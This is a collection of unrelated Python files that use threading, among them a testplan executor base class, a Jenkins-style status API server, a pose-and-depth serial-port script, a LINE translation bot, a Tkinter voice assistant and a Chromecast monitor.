| source | python |
|---|---|
create_threads.py
|
#!/usr/bin/env python3
# This multithreading program creates five threads, starting one every
# two seconds; each thread prints "Hello World"
import threading
import time
def HelloWorld():
"""User defined Thread function"""
print "Hello World"
return
def Main():
threads = [] # keep references to the created threads
print "Program started. This program will print Hello World five times..."
for i in range(5):
mythread = threading.Thread(target=HelloWorld)
threads.append(mythread)
time.sleep(2)
mythread.start()
print "Done! Program ended"
if __name__ == "__main__":
Main()
|
base.py
|
"""Executor base classes."""
import threading
from collections import OrderedDict
from testplan.common.entity import Resource, ResourceConfig
from testplan.common.utils.thread import interruptible_join
class ExecutorConfig(ResourceConfig):
"""
Configuration object for
:py:class:`Executor <testplan.runners.base.Executor>` resource.
Inherits all
:py:class:`~testplan.common.entity.base.ResourceConfig`
options.
"""
class Executor(Resource):
"""
Receives items, executes them and creates results.
Subclasses must implement the ``Executor._loop`` and
``Executor._execute`` logic to execute the input items.
"""
CONFIG = ExecutorConfig
_STOP_TIMEOUT = 10
def __init__(self, **options):
super(Executor, self).__init__(**options)
self._loop_handler = None
self._input = OrderedDict()
self._results = OrderedDict()
self.ongoing = []
@property
def results(self):
"""Items results."""
return self._results
@property
def added_items(self):
"""Returns added items."""
return self._input
def added_item(self, uid):
"""Returns the added item."""
return self._input[uid]
def add(self, item, uid):
"""
Adds an item for execution.
:param item: To be executed and create a result.
:type item: ``object``
:param uid: Unique id.
:type uid: ``str``
"""
if self.active:
self._input[uid] = item
# `NoRunpathPool` adds item after calling `_prepopulate_runnables`
# so the following step is still needed
if uid not in self.ongoing:
self.ongoing.append(uid)
def get(self, uid):
"""Get item result by uid."""
return self._results[uid]
def _loop(self):
raise NotImplementedError()
def _execute(self, uid):
raise NotImplementedError()
def _prepopulate_runnables(self):
# If we are to apply test_sorter, it would be here
# but it's not easy to implement a reasonable behavior
# as _input could be a mixture of runnable/task/callable
self.ongoing = list(self._input.keys())
def starting(self):
"""Starts the execution loop."""
self._prepopulate_runnables()
self._loop_handler = threading.Thread(target=self._loop)
self._loop_handler.daemon = True
self._loop_handler.start()
def stopping(self):
"""Stop the executor."""
if self._loop_handler:
interruptible_join(self._loop_handler, timeout=self._STOP_TIMEOUT)
def abort_dependencies(self):
"""Abort items running before aborting self."""
for uid in self.ongoing:
yield self._input[uid]
@property
def is_alive(self):
"""Poll the loop handler thread to check it is running as expected."""
if self._loop_handler:
return self._loop_handler.is_alive()
else:
return False
def pending_work(self):
"""Resource has pending work."""
return len(self.ongoing) > 0
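# A minimal illustrative sketch (an assumption, not part of testplan): one way
# a concrete executor could implement ``_loop`` and ``_execute`` is to treat
# every added item as a plain callable and store its return value. The name
# ``LocalCallableExecutor`` is hypothetical.
import time

class LocalCallableExecutor(Executor):
    """Runs added callables one by one on the loop thread (sketch only)."""

    def _execute(self, uid):
        item = self._input[uid]
        self._results[uid] = item()  # run the callable, keep its result

    def _loop(self):
        while self.active:
            if self.ongoing:
                uid = self.ongoing[0]
                self._execute(uid)
                self.ongoing.pop(0)  # item finished, drop it from the queue
            else:
                time.sleep(0.1)  # idle until new work is added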
|
apiserveroutput.py
|
# Copyright (C) Schweizerische Bundesbahnen SBB, 2016
# Python 3.4
#
# supplies a list of available job-names under http://localhost:8080/jobs
# supplies data for a job under http://localhost:8080/job/<job-name>/lastBuild/api/json
#
__author__ = 'florianseidl'
from http.server import HTTPServer, BaseHTTPRequestHandler
import re
import json
import logging
import sys
from threading import Thread, RLock
from time import sleep
from datetime import datetime
from output import NameFilter
from cimon import JobStatus,RequestStatus,Health
logger = logging.getLogger(__name__)
default_host = "localhost"
default_port = 8080
default_views = {"all" : re.compile(r'.*')}
def create(configuration, key=None):
"""Create an instance (called by cimon.py)"""
global host, port, created, views
if created: # safeguard against double creation since we use global variables
raise ValueError("There is allready one API server configured, only one is allwowed")
host = configuration.get("host", default_host)
port = configuration.get("port", default_port)
views_from_config = configuration.get("views", {}) # view: pattern
for view_name, pattern in views_from_config.items():
views[view_name] = re.compile(pattern if pattern else r'.*')
created = True
return ApiServerOutput(build_filter_pattern=configuration.get("buildFilterPattern", None),
collector_filter_pattern = configuration.get("collectorFilterPattern", None))
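# Illustrative configuration sketch (assumed values, not taken from cimon):
# these are exactly the keys that create() above looks up.
_example_configuration = {
    "host": "localhost",                  # interface for the HTTP server
    "port": 8080,                         # port for the HTTP server
    "views": {"nightly": r"nightly-.*"},  # view name -> job-name regex
    "buildFilterPattern": r".*",          # jobs exposed by this output
    "collectorFilterPattern": None,       # no collector filtering
}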
created = False
host = default_host
port = default_port
__shared_status__ = {}
server = None
server_lock = RLock()
collector_filter=NameFilter()
views=default_views
def start_http_server_if_not_started():
global server_lock
try:
server_lock.acquire()
global server
if not server:
server = HTTPServer((host, port), ApiServerRequestHandler)
logger.info("Starting http server at %s:%d", host, port)
Thread(target=server.serve_forever).start()
finally:
server_lock.release()
def stop_http_server():
try:
server_lock.acquire()
global server # ignore race conditions as they should not apply (server is only accessed here in the cimon loop and on start)
if server:
server.shutdown()
logger.info("Stopped http server")
server = None
finally:
server_lock.release()
def set_shared_status(status):
global __shared_status__
__shared_status__ = status
def get_shared_status():
return __shared_status__.copy()
class ApiServerOutput():
def __init__(self, build_filter_pattern=None, collector_filter_pattern=None):
self.build_filter = NameFilter(collector_pattern=collector_filter_pattern,job_name_pattern=build_filter_pattern)
def on_update(self, status):
start_http_server_if_not_started()
set_shared_status(self.__filter_status__(status))
def __filter_status__(self, status):
filtered = self.build_filter.filter_status(status)
return {k[1]:v for k,v in filtered.items()}
def close(self):
stop_http_server()
class ApiServer():
""" A delegate to the delegate (HTTPRequestHander) as is easy to test """
job_request_pattern = re.compile(r"/job/([\w\.\-/_]*)/lastBuild/api/json.*")
result_to_color = {Health.SICK : "red",
Health.UNWELL : "yellow",
Health.HEALTHY : "blue"}
health_to_jenkins_status = {Health.SICK : "FAILURE",
Health.UNWELL : "UNSTABLE",
Health.HEALTHY : "SUCCESS"}
def handle_get(self, path):
try:
status = get_shared_status()
if(path == "/jobs"):
return self.list_all_jobs(status=status)
logger.info("handle_get: %s", path)
if "all" in status and status["all"].request_status == RequestStatus.ERROR:
return (500, "Error requesting any job")
else:
job_match = self.job_request_pattern.match(path)
if job_match and len(job_match.groups()) > 0:
logger.info("job_match value=%s", job_match.group(1))
return self.handle_job(job=job_match.group(1), status=status)
else:
logger.info("no job_match")
return (404, 'Path "%s" is not handled.' % path)
except Exception:
logging.error("Error handling HTTP Request", exc_info=True)
return (500, str(sys.exc_info()))
def list_all_jobs(self, status):
return (200, self.__to_jenkins_job_list__(status.keys()))
def __to_jenkins_job_list__(self, keys):
jenkins_response = [key for key in keys]
return jenkins_response
def handle_job(self, job, status):
jobWithSlash=job+'/'
# config can contain job name with or without terminating slash; regexp always delivers job name without terminating slash
if job in status:
job_status=status[job]
logging.debug("handle_job: match for job=%s" % job)
elif jobWithSlash in status:
job_status=status[jobWithSlash]
logging.debug("handle_job: match for job=%s" % jobWithSlash)
else:
job_status = None
logging.warning("handle_job: no match for job=%s" % job)
if job_status and job_status.request_status == RequestStatus.OK:
return (200, self.__to_jenkins_job_result__(job_status))
elif job_status and job_status.request_status == RequestStatus.ERROR:
return (500, 'Error requesting job "%s"' % job)
elif job_status and job_status.request_status == RequestStatus.NOT_FOUND:
return (404, "Not found for job %s" % job)
else:
return (404, 'Unknown build job "%s"' % job)
def __to_jenkins_job_result__(self, job_status):
jenkins_response = {
"result" : self.health_to_jenkins_status[job_status.health] if job_status.health in self.health_to_jenkins_status else None,
"building" : job_status.active
}
if job_status.number:
jenkins_response["number"] = job_status.number
if job_status.timestamp:
jenkins_response["timestamp"] = job_status.timestamp.timestamp() * 1000
if job_status.names:
jenkins_response["culprits"] = [{"fullName" : name} for name in job_status.names]
if job_status.duration:
jenkins_response["duration"] = job_status.duration
if job_status.fullDisplayName:
jenkins_response["fullDisplayName"] = job_status.fullDisplayName
if job_status.url:
jenkins_response["url"] = job_status.url
if job_status.builtOn:
jenkins_response["builtOn"] = job_status.builtOn
if job_status.cause:
jenkins_response["actions"] = [{"causes": [{"shortDescription": job_status.cause}]}]
return jenkins_response
class ApiServerRequestHandler(BaseHTTPRequestHandler):
""" A shallow adapter to the Python http request handler as it is hard to test"""
api_server = ApiServer()
def do_GET(self):
try:
result = self.api_server.handle_get(self.path)
if(200 <= result[0] < 300):
logging.debug('Response to "%s" http status code %d: %s' % (self.path, result[0], str(result[1])))
self.send_ok(code=result[0], jenkins_response=result[1])
else: # some kind of error....
logging.log(logging.INFO if result[0] < 500 else logging.WARNING, 'Error requesting "%s" http status code %d: %s' % (self.path, result[0], str(result[1])))
self.send_error(code=result[0], message=result[1])
finally:
self.wfile.flush()
def send_ok(self, code, jenkins_response):
self.send_response(code)
self.send_header("Content-type","application/json;charset=utf-8")
self.end_headers()
self.wfile.write(json.dumps(jenkins_response).encode("utf-8"))
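# Hypothetical client sketch (not part of cimon): once the server is running,
# the two endpoints described at the top of this module can be queried like
# this. The job name "job.a" matches the manual test in __main__ below.
def _example_client(job_name="job.a"):
    from urllib.request import urlopen
    jobs = json.loads(urlopen("http://localhost:8080/jobs").read().decode("utf-8"))
    last_build = json.loads(
        urlopen("http://localhost:8080/job/%s/lastBuild/api/json" % job_name)
        .read().decode("utf-8"))
    return jobs, last_build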
if __name__ =='__main__':
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logging.info("test: starting server for manual tests, available job: 'job.a'")
o = ApiServerOutput()
o.on_update({"build" : {"job.a" :{"request_status" : "ok", "result" : "success", "number" : 42, "timestamp" : datetime.fromtimestamp(1467131487.090)}}})
logging.info("test: serving for 30 seconds")
sleep(30)
stop_http_server()
logging.info("test: stopped server")
|
final.py
|
"""Compute depth maps for images in the input folder.
"""
import os
import glob
import torch
import utils
import cv2
import sys
import threading
import serial
from sys import platform
import argparse
import matplotlib.pyplot as plt
import numpy as np
from torchvision.transforms import Compose
from midas.dpt_depth import DPTDepthModel
from midas.midas_net import MidasNet
from midas.midas_net_custom import MidasNet_small
from midas.transforms import Resize, NormalizeImage, PrepareForNet
import math
ser = serial.Serial('COM4', 9600)
def run(img_name, output_path, model_path, model_type="midas_v21_small", optimize=True):
"""Run MonoDepthNN to compute depth maps.
Args:
img_name: captured input picture
output_path (str): path to output folder
model_path (str): path to saved model
"""
print("initialize")
# select device
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device: %s" % device)
# load network
if model_type == "dpt_large": # DPT-Large
model = DPTDepthModel(
path=model_path,
backbone="vitl16_384",
non_negative=True,
)
net_w, net_h = 384, 384
resize_mode = "minimal"
normalization = NormalizeImage(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])
elif model_type == "dpt_hybrid": #DPT-Hybrid
model = DPTDepthModel(
path=model_path,
backbone="vitb_rn50_384",
non_negative=True,
)
net_w, net_h = 384, 384
resize_mode="minimal"
normalization = NormalizeImage(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])
elif model_type == "midas_v21":
model = MidasNet(model_path, non_negative=True)
net_w, net_h = 384, 384
resize_mode="upper_bound"
normalization = NormalizeImage(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
)
elif model_type == "midas_v21_small":
model = MidasNet_small(model_path, features=64, backbone="efficientnet_lite3", exportable=True, non_negative=True, blocks={'expand': True})
net_w, net_h = 256, 256
resize_mode="upper_bound"
normalization = NormalizeImage(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
)
else:
print(f"model_type '{model_type}' not implemented, use: --model_type large")
assert False
transform = Compose(
[
Resize(
net_w,
net_h,
resize_target=None,
keep_aspect_ratio=True,
ensure_multiple_of=32,
resize_method=resize_mode,
image_interpolation_method=cv2.INTER_CUBIC,
),
normalization,
PrepareForNet(),
]
)
model.eval()
if optimize==True:
# rand_example = torch.rand(1, 3, net_h, net_w)
# model(rand_example)
# traced_script_module = torch.jit.trace(model, rand_example)
# model = traced_script_module
if device == torch.device("cuda"):
model = model.to(memory_format=torch.channels_last)
model = model.half()
model.to(device)
# create output folder
os.makedirs(output_path, exist_ok=True)
print("start processing")
# input
img = utils.read_image(img_name)
img_input = transform({"image": img})["image"]
# compute
with torch.no_grad():
sample = torch.from_numpy(img_input).to(device).unsqueeze(0)
if optimize==True and device == torch.device("cuda"):
sample = sample.to(memory_format=torch.channels_last)
sample = sample.half()
prediction = model.forward(sample)
prediction = (
torch.nn.functional.interpolate(
prediction.unsqueeze(1),
size=img.shape[:2],
mode="bicubic",
align_corners=False,
)
.squeeze()
.cpu()
.numpy()
)
# output
filename = os.path.join(
output_path, "result"
)
# cv2.namedWindow('imagedepth', cv2.WINDOW_NORMAL)
# cv2.imshow('image',prediction)
# cv2.waitKey(0)
mdepth = utils.write_depth(filename, prediction, bits=2)
print("finished")
return mdepth
def processOpenpose(image,op):
# Custom Params (refer to include/openpose/flags.hpp for more parameters)
params = dict()
params["model_folder"] = "../../../models/"
# Construct it from system arguments
# op.init_argv(args[1])
# oppython = op.OpenposePython()
# Add others in path?
params["net_resolution"] = "320x176"
# Starting OpenPose
opWrapper = op.WrapperPython()
opWrapper.configure(params)
opWrapper.start()
imageToProcess = image
# Process Image
datum = op.Datum()
# imageToProcess = cv2.imread(img)
datum.cvInputData = imageToProcess
opWrapper.emplaceAndPop(op.VectorDatum([datum]))
# Display Image
# print("Body keypoints: \n" + str(datum.poseKeypoints))
# cv2.imshow("OpenPose 1.7.0 - Tutorial Python API", datum.cvOutputData)
# cv2.waitKey(0)
return datum.poseKeypoints
# # Image size is 320x426
# tink = np.ones((426,320),dtype='float64')
# tink = tink
# print(tink.shape)
# for i in range(datum.poseKeypoints.shape[0]):
# for j in range(datum.poseKeypoints.shape[1]):
# x = datum.poseKeypoints[i][j][0]
# y = datum.poseKeypoints[i][j][1]
# if y>426 or x>320:
# continue
# score = datum.poseKeypoints[i][j][2]
# #color = score
# color = 1
# print("x,y",int(y),int(x))
# tink[int(y)][int(x)] = 240 * color / 25
# tink[int(y)+1][int(x)] = 240 * color / 25
# tink[int(y)][int(x)+1] = 240 * color / 25
# tink[int(y)-1][int(x)] = 240 * color / 25
# tink[int(y)][int(x)-1] = 240 * color / 25
# tink[int(y) + 1][int(x)+1] = 240 * color / 25
# tink[int(y)-1][int(x) + 1] = 240 * color / 25
# tink[int(y) - 1][int(x)-1] = 240 * color / 25
# tink[int(y) + 1][int(x) - 1] = 240 * color / 25
# plt.imshow(tink,cmap="gray")
# plt.axis('off')
# plt.show()
def isSend(Keypoints):
"""Three points on one line
Args:
Keypoints :Three points
"""
a_2 =(Keypoints[0][0] - Keypoints[1][0])**2 + (Keypoints[0][1] - Keypoints[1][1])**2
b_2 =(Keypoints[1][0] - Keypoints[2][0])**2 + (Keypoints[1][1] - Keypoints[2][1])**2
c_2 =(Keypoints[0][0] - Keypoints[2][0])**2 + (Keypoints[0][1] - Keypoints[2][1])**2
angle = math.acos((a_2 + b_2 - c_2)/(2 * math.sqrt(a_2) * math.sqrt(b_2)))
print("angle",angle)
if 0 <= angle <= math.pi :
print("ok")
return True
else:
return False
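# Worked check (added illustration): for the collinear points (0,0), (1,0),
# (2,0) the law-of-cosines angle at the middle point is acos(-1) = pi, i.e. a
# fully extended arm gives the maximum angle.
def exampleStraightArm():
    return isSend([[0, 0], [1, 0], [2, 0]])  # angle == pi, returns True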
def calculate(poseKeypoints,imageDepth):
for i in range(poseKeypoints.shape[0]): # people
left = [7,6,5]
leftKeypoints = []
right = [4,3,2]
for j in left:
x = poseKeypoints[i][j][0]
y = poseKeypoints[i][j][1]
leftKeypoints.append([x,y])
# print("left",leftKeypoints)
# print(leftKeypoints[1][0])
rightKeypoints = []
for j in right:
x = poseKeypoints[i][j][0]
y = poseKeypoints[i][j][1]
rightKeypoints.append([x,y])
print(rightKeypoints)
print(rightKeypoints[1][0])
if(isSend(leftKeypoints)):
# send data
getDepth = 1
print("leftHand")
# getDepth = imageDepth[int(poseKeypoints[i][7][1])][int(poseKeypoints[i][7][0])]
for i in range(5):
success_bytes = ser.write(str(getDepth).encode("gbk"))
# print("getDepth",imageDepth[int(poseKeypoints[i][7][1])][int(poseKeypoints[i][7][0])])
# if(isSend(rightKeypoints)):
# # getDepth = imageDepth[int(poseKeypoints[i][4][1])][int(poseKeypoints[i][4][0])]
# getDepth = 1
# print("leftHand")
# for i in range(5):
# success_bytes = ser.write(str(getDepth).encode("gbk"))
# # print("getDepth",imageDepth[int(poseKeypoints[i][4][1])][int(poseKeypoints[i][4][0])])
def reads():
""" 读取数据 """
global out
while True:
if out == '':
while ser.inWaiting() > 0:
out += ser.read(1).decode() # read one byte at a time
print(out)
if 0xFF == ord('q'): # if 'q' is pressed, capture and exit
break
def camera():
global out
cap = cv2.VideoCapture(0) # open the camera
while (1):
# get a frame
ret, frame = cap.read()
# frame = cv2.flip(frame, 1) # the camera mirrors the user; flip the image horizontally for normal display
# show a frame
cv2.imshow("capture", frame) # 生成摄像头窗口
if cv2.waitKey(1) and out != '': # once serial input has arrived, capture a frame and process it
print("okkkk")
x, y = frame.shape[0:2]
imgecroped = cv2.resize(frame, (int(y / 2), int(x / 2)))
print(imgecroped.shape)
cv2.imwrite("test.jpg", imgecroped) # 保存路径
cv2.destroyAllWindows()
# process openpose
poseKeypoints = processOpenpose(imgecroped,op)
# print(type(poseKeypoints))
# compute depth maps
imageDepth = run(imgecroped, args.output_path, args.model_weights, args.model_type, args.optimize)
calculate(poseKeypoints,imageDepth)
# out = ''
break
cap.release()
if __name__ == "__main__":
try:
# Import Openpose (Windows/Ubuntu/OSX)
dir_path = os.path.dirname(os.path.realpath(__file__))
try:
# Windows Import
if platform == "win32":
# Change these variables to point to the correct folder (Release/x64 etc.)
sys.path.append(dir_path + '/../../python/openpose/Release')
os.environ['PATH'] = os.environ['PATH'] + ';' + dir_path + '/../../x64/Release;' + dir_path + '/../../bin;'
import pyopenpose as op
else:
# Change these variables to point to the correct folder (Release/x64 etc.)
sys.path.append('../../python')
# If you run `make install` (default path is `/usr/local/python` for Ubuntu), you can also access the OpenPose/python module from there. This will install OpenPose and the python library at your desired installation path. Ensure that this is in your python path in order to use it.
# sys.path.append('/usr/local/python')
from openpose import pyopenpose as op
except ImportError as e:
print('Error: OpenPose library could not be found. Did you enable `BUILD_PYTHON` in CMake and have this Python script in the right folder?')
raise e
except Exception as e:
print(e)
sys.exit(-1)
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input_path',
default='input',
help='folder with input images'
)
parser.add_argument('-o', '--output_path',
default='output',
help='folder for output images'
)
parser.add_argument('-m', '--model_weights',
default=None,
help='path to the trained weights of model'
)
parser.add_argument('-t', '--model_type',
default='midas_v21_small',
help='model type: dpt_large, dpt_hybrid, midas_v21 or midas_v21_small'
)
parser.add_argument('-n', '--net_resolution',
default='240x160',
help='size of image'
)
parser.add_argument('--optimize', dest='optimize', action='store_true')
parser.add_argument('--no-optimize', dest='optimize', action='store_false')
parser.set_defaults(optimize=True)
args = parser.parse_args()
print("canshu",args)
# args = parser.parse_known_args()
# # Custom Params (refer to include/openpose/flags.hpp for more parameters)
# params = dict()
# params["model_folder"] = "../../../models/"
# # Add others in path?
# for i in range(0, len(args[1])):
# curr_item = args[1][i]
# if i != len(args[1])-1: next_item = args[1][i+1]
# else: next_item = "1"
# if "--" in curr_item and "--" in next_item:
# key = curr_item.replace('-','')
# if key not in params: params[key] = "1"
# elif "--" in curr_item and "--" not in next_item:
# key = curr_item.replace('-','')
# if key not in params: params[key] = next_item
default_models = {
"midas_v21_small": "weights/midas_v21_small-70d6b9c8.pt",
"midas_v21": "weights/midas_v21-f6b98070.pt",
"dpt_large": "weights/dpt_large-midas-2f21e586.pt",
"dpt_hybrid": "weights/dpt_hybrid-midas-501f0c75.pt",
}
if args.model_weights is None:
args.model_weights = default_models[args.model_type]
# set torch options
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
out = ''
t1 = threading.Thread(target=reads, name='reads')
t2 = threading.Thread(target=camera, name='camera')
t1.start()
t2.start()
|
Multitasking_Using_Multiple_Thread.py
|
# Multitasking using multiple threads
from threading import Thread
class Hotel:
def __init__(self, t):
self.t = t
def food(self):
for i in range(1, 6):
print(self.t, i)
h1 = Hotel("Take Order from table")
h2 = Hotel("Serve order to table")
t1 = Thread(target=h1.food)
t2 = Thread(target=h2.food)
t1.start()
t2.start()
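# Equivalent sketch (added illustration, not used above): the same two tasks
# can share one plain function by passing the message via Thread(args=...)
# instead of storing it on a Hotel instance.
def food(message):
    for i in range(1, 6):
        print(message, i)

# t3 = Thread(target=food, args=("Take Order from table",))
# t4 = Thread(target=food, args=("Serve order to table",))
# t3.start()
# t4.start()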
|
main.py
|
from flask import Flask, request, abort
from os import environ, path
import requests
from tinytag import TinyTag
from zhconv import convert
from helper import database
import threading
from linebot import (
LineBotApi, WebhookHandler
)
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import (
MessageEvent, TextMessage, TextSendMessage,
AudioSendMessage
)
from linebot.exceptions import LineBotApiError
app = Flask(__name__)
line_bot_api = LineBotApi(environ['LINE_CHANNEL_ACCESS_TOKEN'])
handler = WebhookHandler(environ['LINE_CHANNEL_SECRET'])
@app.route('/')
def index():
return 'It works!'
@app.route('/callback', methods=['POST'])
def callback():
signature = request.headers['X-Line-Signature']
body = request.get_data(as_text=True)
app.logger.info('X-Line-Signature: ' + signature)
app.logger.info('Request body: ' + body)
try:
handler.handle(body, signature)
except InvalidSignatureError:
app.logger.error('LINE_CHANNEL_SECRET Error.')
abort(400)
return 'OK'
@handler.add(MessageEvent, message=TextMessage)
def handle_message(event):
base_dir = path.abspath(path.dirname(__file__))
relative_dir = 'static/uploads/'
file_name = event.message.id
file_extension = '.mp3'
file_rel_path = path.join(relative_dir, file_name + file_extension)
file_abs_path = path.join(base_dir, file_rel_path)
url_path = path.join('https://' + request.host, file_rel_path)
msg = str(event.message.text)
url = 'https://translate.google.com/translate_tts?ie=UTF-8&client=tw-ob&tl=en&q={}'.format(msg)
res = requests.get(url)
with open(file_abs_path, 'wb') as fd:
for chunk in res.iter_content():
fd.write(chunk)
tiny_tag = TinyTag.get(file_abs_path)
# print('It is %f milliseconds long.' % (tiny_tag.duration * 1000))
params = {
'key': environ['YANDEX_API_KEY'],
'text': msg,
'lang': 'zh',
}
res = requests.get('https://translate.yandex.net/api/v1.5/tr.json/translate', params=params)
yandex = res.json()
yandex_text = convert(yandex['text'][0], 'zh-tw')
try:
line_bot_api.reply_message(event.reply_token, [
AudioSendMessage(
original_content_url=url_path,
duration= tiny_tag.duration * 1000, #milliseconds
),
TextSendMessage(text='你說:「'+event.message.text+'」。'),
TextSendMessage(text='點這裡聽聽看:{}'.format(url_path)),
TextSendMessage(text='意思是:{}'.format(yandex_text)),
])
except LineBotApiError as e:
print(e.status_code)
print(e.error.message)
print(e.error.details)
if not environ.get('GOOGLE_CLIENT_SECRET') or not environ.get('GOOGLE_SHEET_NAME'):
app.logger.info("GOOGLE_CLIENT_SECRET or GOOGLE_SHEET_NAME was not found or empty.")
else:
profile = line_bot_api.get_profile(event.source.user_id)
kwargs_dict = {
'profile_dict': {
'display_name': profile.display_name,
'picture_url': profile.picture_url,
'status_message': profile.status_message,
'user_id': profile.user_id
},
'msg': msg
}
db_thread = threading.Thread(target=database.append_google_sheet, kwargs=kwargs_dict)
db_thread.start()
if __name__ == '__main__':
app.run(port = int(environ['PORT']))
|
main.py
|
from tkinter import *
import os
import time
import threading
import commands
from recognize import hear, getcommand, say
'''Thread Control Variable'''
thread_control = -1
'''Threading Function'''
def auto_control():
global thread_control
while True:
'''Hear current audio and use it for processing'''
if thread_control==1:
entry_text.set("")
entry_text.set(getcommand())
submit()
else:
time.sleep(0.4)
'''Thread 1'''
thread1 = threading.Thread(target=auto_control)
window = Tk()
window.wait_visibility(window)
window.title("Rachel - Voice Assistant")
window.wm_attributes('-alpha',0.8)
entry_text=StringVar()
thread1.start()
def set_size_and_location(window, w, h, x, y):
w = int(w * window.winfo_screenwidth())
h = int(h * window.winfo_screenheight())
x = int(x * window.winfo_screenwidth())
y = int(y * window.winfo_screenheight())
window.geometry('%dx%d+%d+%d' % (w,h,x,y))
def hide_and_show_window():
global window,thread_control,entry
window.withdraw()
'''Making The Window Reappear'''
#hear()
thread_control=1
window.update()
window.deiconify()
entry.focus_set()
'''Function to Take Input From Text Field And Give In for processing'''
def submit():
global entry_text,thread_control, head, heading
thread_control=-1
'''Getting Query'''
x = entry_text.get()
x = x.lower()
heading.place(relx = 0.20)
head.set("Processing")
x1 = commands.command(x, head)
head.set("Rachel")
heading.place(relx = 0.45, rely = 0.2)
hide_and_show_window()
''' Initialization Of GUI,setting size and location'''
set_size_and_location(window,0.25,0.25,0.8,0.1)
'''Set Background Color'''
window.configure(background='black')
'''Adding Heading of Assistant'''
head = StringVar()
head.set("Rachel")
heading = Label( window, textvariable = head, anchor="center", bg='black', fg='white')
heading.place(relx=0.45,rely=0.2)
'''Adding Text Field To Take Commands'''
entry = Entry(window,bd=1,width=int(window.winfo_screenwidth()*0.025), bg='#171c26', textvariable=entry_text)
entry.place(relx=0.1,rely=0.6)
hide_and_show_window()
window.mainloop()
|
monitor.py
|
import pychromecast
import threading
import time
import logging
import pprint
from typing import List, Dict
logger = logging.getLogger(__name__)
def get_device_info(cast: pychromecast.Chromecast) -> Dict[str, str]:
return {'uuid': cast.device.uuid, 'name': cast.device.friendly_name}
def find_differences(actual: Dict, expected: Dict):
differences = {}
for key in actual:
actual_value = actual[key]
if isinstance(actual_value, dict):
expected_value = expected.get(key, {})
difference = find_differences(actual_value, expected_value)
if difference:
differences[key] = difference
else:
try:
expected_value = expected[key]
if expected_value != actual_value:
differences[key] = actual_value
except KeyError:
differences[key] = actual_value
return differences
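# Added illustration (not called anywhere): find_differences() keeps only the
# keys whose values are new or changed in ``actual``, recursing into nested
# dicts, which is how status changes are detected below.
def _example_find_differences():
    actual = {"tv": {"title": "B", "duration": 60}, "speaker": {"title": "C"}}
    expected = {"tv": {"title": "A", "duration": 60}}
    # -> {'tv': {'title': 'B'}, 'speaker': {'title': 'C'}}
    return find_differences(actual, expected)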
class MonitorThread(threading.Thread):
UPDATE_DEVICES_PERIOD = 10.0
UPDATE_STATUS_PERIOD = 1.0
def __init__(self):
super(MonitorThread, self).__init__()
self.stop_event = threading.Event()
self.cast_list_lock = threading.Lock()
self.cast_list = []
self.last_statuses = {}
def update_devices(self):
last_list = [cast.device.friendly_name for cast in self.cast_list]
with self.cast_list_lock:
self.cast_list, cast_browser = pychromecast.get_chromecasts()
name_list = [cast.device.friendly_name for cast in self.cast_list]
casts_added = [cast.device.friendly_name for cast in self.cast_list
if cast.device.friendly_name not in last_list]
casts_removed = [name for name in last_list if name not in name_list]
rv = {}
if casts_added:
logger.info(f"Casts added: {casts_added}")
rv["added"] = casts_added
if casts_removed:
logger.info(f"Casts removed: {casts_removed}")
rv["removed"] = casts_removed
return rv
def update_statuses(self, retries=1):
cur_statuses = {}
with self.cast_list_lock:
for cast in self.cast_list:
for i in range(retries + 1):
cast.wait()
mc = cast.media_controller
if mc.status.last_updated is None:
continue
cur_statuses[cast.device.friendly_name] = {
'content_id': mc.status.content_id,
'content_type': mc.status.content_type,
'duration': mc.status.duration,
'title': mc.status.title,
}
status_changes = find_differences(cur_statuses, self.last_statuses)
self.last_statuses = cur_statuses
if status_changes:
logger.info("Updated statuses:\n" + pprint.pformat(status_changes))
return status_changes
def stop(self):
self.stop_event.set()
def run(self) -> None:
last_devices_update = None
last_status_update = None
while not self.stop_event.is_set():
now = time.perf_counter()
if (last_devices_update is None) or (
now - last_devices_update >= self.UPDATE_DEVICES_PERIOD):
last_devices_update = now
self.update_devices()
if (last_status_update is None) or (
now - last_status_update >= self.UPDATE_STATUS_PERIOD):
last_status_update = now
self.update_statuses()
# class MonitorShell(cmd.Cmd):
# intro = ('Ready to monitor chromecast and manage recordings.\n'
# 'Type help or ? to list commands.\n')
# prompt = '(monitor) '
# options = {}
# active = None
# active_id = None
# active_title = None
# destination = None
# destination_root = os.path.join(pathlib.Path.home(), "Recordings")
# date_fmt = "%Y-%m-%d_%H-%M-%S"
#
# def do_bye(self, _):
# """ Stop recording, close the window, and exit """
# print('Peace Love Unity Respect')
# # self.close()
# return True
#
# def _print_options(self):
# print("\n".join(f"({k}): {self.options[k].device.friendly_name}"
# for k in sorted(self.options)))
#
# def do_monitor(self, arg):
# if self.active:
# friendly_name = self.active.device.friendly_name
# print(f"Monitor already active on {friendly_name}")
# return
#
# self._update_options()
#
# try:
# selection = int(arg)
# if selection > 0:
# friendly_name = self.options[selection]
# else:
# print(f"Selection out of bounds '{arg}'")
# self._print_options()
# return
# except ValueError:
# try:
# selection = min(k for k in self.options
# if self.options[k].device.friendly_name == arg)
# friendly_name = self.options[selection]
# except ValueError:
# print(f"Failed to parse selection '{arg}'")
# self._print_options()
# return
# except KeyError:
# print(f"Selection out of bounds '{arg}'")
# self._print_options()
# return
#
# self.active = self.options[selection]
# self._start_thread()
# print(f"Monitor started on {self.active.device.friendly_name}")
#
# #-- helper methods
# def _start_thread(self):
# self.active_id = None
# self.active_title = None
# self.destination = os.path.join(self.destination_root,
# self.active.device.friendly_name)
# os.makedirs(self.destination, exist_ok=True)
# thread = threading.Thread(target=self._monitor)
# thread.start()
#
# def _set_active_content(self, content_id: str, title: str):
# if content_id != self.active_id:
# self.active_id = content_id
# self.active_title = title
# now = datetime.datetime.now()
# print(f"[{now}] Video changed: '{title}' ({content_id})")
# file_name = now.strftime(self.date_fmt) + ".txt"
# path_file = os.path.join(self.destination, file_name)
# with open(path_file, "w") as file:
# file.write(f"https://www.youtube.com/watch?v={content_id}\n")
# file.write(f"{title}\n")
#
# def _monitor(self):
# self.active.wait()
